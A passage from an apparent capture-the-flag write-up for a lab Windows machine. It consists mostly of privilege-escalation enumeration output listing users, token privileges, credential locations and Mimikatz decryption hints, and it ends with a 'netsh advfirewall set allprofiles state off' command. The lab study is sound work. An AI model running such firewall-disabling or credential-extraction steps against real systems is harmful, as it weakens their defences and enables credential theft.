0.0.0.0 0.0.0.0 10.10.10.2 Default
===========================================================================
IPv6 Route Table
===========================================================================
Active Routes:
If Metric Network Destination Gateway
10 271 ::/0 fe80::250:56ff:feb9:6ca8
1 331 ::1/128 On-link
10 271 dead:beef::/64 On-link
10 271 dead:beef::8b/128 On-link
10 271 dead:beef::7d8e:5228:fa88:6508/128
On-link
10 271 dead:beef::b5ea:c90a:5da:c508/128
On-link
10 271 fe80::/64 On-link
10 271 fe80::7d8e:5228:fa88:6508/128
On-link
1 331 ff00::/8 On-link
10 271 ff00::/8 On-link
===========================================================================
Persistent Routes:
None
[+] Hosts file
[+] DNS CACHE
[+] WIFI
[*] BASIC USER INFO
[i] Check if you are inside the Administrators group or if you have enabled any token that can be use to escalate privileges like SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebbugPrivilege
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#users-and-groups>
[+] CURRENT USER
User name shaun
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 16/06/2020 15:08:08
Password expires Never
Password changeable 16/06/2020 15:08:08
Password required No
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 16/06/2020 22:38:46
Logon hours allowed All
Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.
The request will be processed at a domain controller for domain WORKGROUP.
USER INFORMATION
----------------
User Name SID
========== ==============================================
buff\shaun S-1-5-21-2277156429-3381729605-2640630771-1001
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
[+] USERS
User accounts for \\\\BUFF
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
shaun WDAGUtilityAccount
The command completed successfully.
[+] GROUPS
Aliases for \\\\BUFF
-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Administrators
*Backup Operators
*Cryptographic Operators
*Device Owners
*Distributed COM Users
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Remote Desktop Users
*Remote Management Users
*Replicator
*System Managed Accounts Group
*Users
The command completed successfully.
[+] ADMINISTRATORS GROUPS
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
The command completed successfully.
[+] CURRENT LOGGED USERS
No User exists for *
[+] Kerberos Tickets
Current LogonId is 0:0x17d55
Error calling API LsaCallAuthenticationPackage (ShowTickets substatus): 1312
klist failed with 0xc000005f/-1073741729: A specified logon session does not exist. It may already have been terminated.
[+] CURRENT CLIPBOARD
[i] Any password inside the clipboard?
[*] SERVICE VULNERABILITIES
[+] SERVICE BINARY PERMISSIONS WITH WMIC and ICACLS
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services>
Node - BUFF
ERROR:
Description = Access denied
[+] CHECK IF YOU CAN MODIFY ANY SERVICE REGISTRY
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services>
[+] UNQUOTED SERVICE PATHS
[i] When the path is not quoted (ex: C:\\Program files\\soft\\new folder\\exec.exe) Windows will try to execute first 'C:\\Program.exe', then 'C:\\Program Files\\soft\\new.exe' and finally 'C:\\Program Files\\soft\\new folder\\exec.exe'. Try to create 'C:\\Program Files\\soft\\new.exe'
[i] The permissions are also checked and filtered using icacls
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services>
[*] DLL HIJACKING in PATHenv variable
[i] Maybe you can take advantage of modifying/creating some binary in some of the following locations
[i] PATH variable entries permissions - place binary or DLL to execute instead of legitimate
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dll-hijacking>
C:\\Windows\\system32 NT SERVICE\\TrustedInstaller:(F)
C:\\Windows NT SERVICE\\TrustedInstaller:(F)
C:\\Windows\\System32\\Wbem NT SERVICE\\TrustedInstaller:(F)
C:\\Users\\shaun\\AppData\\Local\\Microsoft\\WindowsApps NT AUTHORITY\\SYSTEM:(OI)(CI)(F)
BUFF\\shaun:(OI)(CI)(F)
[*] CREDENTIALS
[+] WINDOWS VAULT
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#windows-vault>
Currently stored credentials:
* NONE *
[+] DPAPI MASTER KEYS
[i] Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi>
Directory: C:\\Users\\shaun\\AppData\\Roaming\\Microsoft\\Protect
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 14/07/2020 13:41 S-1-5-21-2277156429-3381729605-2640630771-1001
[+] DPAPI MASTER KEYS
[i] Use the Mimikatz 'dpapi::cred' module with appropriate /masterkey to decrypt
[i] You can also extract many DPAPI masterkeys from memory with the Mimikatz 'sekurlsa::dpapi' module
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi>
Looking inside C:\\Users\\shaun\\AppData\\Roaming\\Microsoft\\Credentials\\
Looking inside C:\\Users\\shaun\\AppData\\Local\\Microsoft\\Credentials\\
DFBE70A7E5CC19A398EBF1B96859CE5D
[+] Unattended files
[+] SAM and SYSTEM backups
[+] McAffee SiteList.xml
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
[+] GPP Password
[+] Cloud Credentials
[+] AppCmd
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe>
[+] Files in registry that may contain credentials
[i] Searching specific files that may contains credentials.
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files>
Looking inside HKCU\\Software\\ORL\\WinVNC3\\Password
Looking inside HKEY_LOCAL_MACHINE\\SOFTWARE\\RealVNC\\WinVNC4/password
Looking inside HKLM\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\WinLogon
LastUsedUsername REG_SZ Administrator
DefaultUserName REG_SZ Administrator
DefaultDomainName REG_SZ BUFF
Looking inside HKLM\\SYSTEM\\CurrentControlSet\\Services\\SNMP
Looking inside HKCU\\Software\\TightVNC\\Server
Looking inside HKCU\\Software\\SimonTatham\\PuTTY\\Sessions
Looking inside HKCU\\Software\\OpenSSH\\Agent\\Keys
C:\\Windows\\Panther\\setupinfo
C:\\Windows\\WinSxS\\amd64_microsoft-windows-i..raries-servercommon_31bf3856ad364e35_10.0.17134.1456_none_63f3fdaf124b7b7c\\appcmd.exe
C:\\Windows\\WinSxS\\amd64_microsoft-windows-i..raries-servercommon_31bf3856ad364e35_10.0.17134.1_none_8f0c17e6d938fd6f\\appcmd.exe
C:\\Windows\\WinSxS\\wow64_microsoft-windows-i..raries-servercommon_31bf3856ad364e35_10.0.17134.1456_none_6e48a80146ac3d77\\appcmd.exe
C:\\Windows\\WinSxS\\wow64_microsoft-windows-i..raries-servercommon_31bf3856ad364e35_10.0.17134.1_none_9960c2390d99bf6a\\appcmd.exe
C:\\xampp\\apache\\conf\\httpd.conf
C:\\xampp\\apache\\conf\\httpd.conf
C:\\xampp\\apache\\conf\\original\\httpd.conf
C:\\xampp\\apache\\conf\\original\\httpd.conf
C:\\xampp\\apache\\conf\\ssl.csr\\server.csr
C:\\xampp\\apache\\logs\\access.log
C:\\xampp\\apache\\logs\\error.log
C:\\xampp\\apache\\logs\\access.log
C:\\xampp\\apache\\logs\\error.log
C:\\xampp\\htdocs\\gym\\ex\\include\\psl-config.php
C:\\xampp\\htdocs\\gym\\include\\psl-config.php
C:\\xampp\\mysql\\backup\\my.ini
C:\\xampp\\mysql\\bin\\my.ini
C:\\xampp\\mysql\\data\\my.ini
C:\\xampp\\php\\php.ini
C:\\xampp\\php\\pear\\PEAR\\Config.php
C:\\xampp\\php\\pear\\PEAR\\Command\\Config.php
C:\\xampp\\php\\pear\\PHP\\Debug\\Renderer\\HTML\\DivConfig.php
C:\\xampp\\php\\pear\\PHP\\Debug\\Renderer\\HTML\\TableConfig.php
C:\\xampp\\php\\pear\\PHPUnit\\Util\\Configuration.php
C:\\xampp\\php\\scripts\\configure.php
C:\\xampp\\phpMyAdmin\\config.inc.php
C:\\xampp\\phpMyAdmin\\config.sample.inc.php
C:\\xampp\\phpMyAdmin\\show_config_errors.php
C:\\xampp\\phpMyAdmin\\examples\\config.manyhosts.inc.php
C:\\xampp\\phpMyAdmin\\libraries\\config.default.php
C:\\xampp\\phpMyAdmin\\libraries\\config.values.php
C:\\xampp\\phpMyAdmin\\libraries\\vendor_config.php
C:\\xampp\\phpMyAdmin\\libraries\\classes\\Config.php
C:\\xampp\\phpMyAdmin\\libraries\\classes\\Config\\ConfigFile.php
C:\\xampp\\phpMyAdmin\\libraries\\classes\\Config\\ServerConfigChecks.php
C:\\xampp\\phpMyAdmin\\libraries\\classes\\Config\\Forms\\Setup\\ConfigForm.php
C:\\xampp\\phpMyAdmin\\libraries\\classes\\Controllers\\Setup\\ConfigController.php
C:\\xampp\\phpMyAdmin\\libraries\\classes\\Plugins\\Auth\\AuthenticationConfig.php
C:\\xampp\\phpMyAdmin\\libraries\\classes\\Setup\\ConfigGenerator.php
C:\\xampp\\phpMyAdmin\\setup\\config.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\config\\ConfigCache.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\config\\ConfigCacheFactory.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\config\\ConfigCacheFactoryInterface.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\config\\ConfigCacheInterface.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\config\\ResourceCheckerConfigCache.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\config\\ResourceCheckerConfigCacheFactory.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\config\\Definition\\ConfigurationInterface.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\config\\Definition\\Exception\\InvalidConfigurationException.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\dependency-injection\\Compiler\\MergeExtensionConfigurationPass.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\dependency-injection\\Compiler\\PassConfig.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\dependency-injection\\Extension\\ConfigurationExtensionInterface.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\dependency-injection\\Loader\\Configurator\\AbstractConfigurator.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\dependency-injection\\Loader\\Configurator\\AbstractServiceConfigurator.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\dependency-injection\\Loader\\Configurator\\AliasConfigurator.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\dependency-injection\\Loader\\Configurator\\ContainerConfigurator.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\dependency-injection\\Loader\\Configurator\\DefaultsConfigurator.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\dependency-injection\\Loader\\Configurator\\InlineServiceConfigurator.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\dependency-injection\\Loader\\Configurator\\InstanceofConfigurator.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\dependency-injection\\Loader\\Configurator\\ParametersConfigurator.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\dependency-injection\\Loader\\Configurator\\PrototypeConfigurator.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\dependency-injection\\Loader\\Configurator\\ReferenceConfigurator.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\dependency-injection\\Loader\\Configurator\\ServiceConfigurator.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\dependency-injection\\Loader\\Configurator\\ServicesConfigurator.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\dependency-injection\\Loader\\Configurator\\Traits\\AutoconfigureTrait.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\dependency-injection\\Loader\\Configurator\\Traits\\ConfiguratorTrait.php
C:\\xampp\\phpMyAdmin\\vendor\\tecnickcom\\tcpdf\\tcpdf_autoconfig.php
C:\\xampp\\phpMyAdmin\\vendor\\tecnickcom\\tcpdf\\config\\tcpdf_config.php
---
Scan complete
First I tried turning off the firewall for all profiles, but the current privileges were not sufficient.
netsh advfirewall set allprofiles state off
Then a quick search for cloudme, and I went all in on it.